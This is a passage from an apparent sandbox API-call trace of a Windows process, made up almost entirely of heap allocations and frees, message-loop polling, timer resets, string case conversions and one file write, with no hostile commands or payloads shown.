(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748b0 [0088.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f28 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9d78 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c88 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e08 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748b0 | out: hHeap=0x2af0000) returned 1 [0088.235] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 1 [0088.236] TranslateMessage (lpMsg=0x8ceef8) returned 0 [0088.236] DispatchMessageW (lpMsg=0x8ceef8) returned 0x0 [0088.236] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0088.236] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0088.236] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74550 | out: hHeap=0x2af0000) returned 1 [0088.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.236] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0088.236] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0088.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0088.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0088.236] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0088.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0088.236] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0088.237] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0088.237] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0088.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0088.238] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0088.238] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.238] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc8) returned 0x37cce18 [0088.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc8) returned 0x37e69b8 [0088.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37cce18 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc8) returned 0x37cce18 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37e69b8 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc8) returned 0x37e69b8 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37cce18 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0088.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.243] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.243] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.243] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0088.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.244] WriteFile (in: hFile=0x294, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0xcdc8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0xcdc8, lpOverlapped=0x0) returned 1 [0088.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0088.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0088.246] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0088.246] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.247] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0088.247] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0088.247] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.247] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.247] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.247] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.247] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0088.247] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 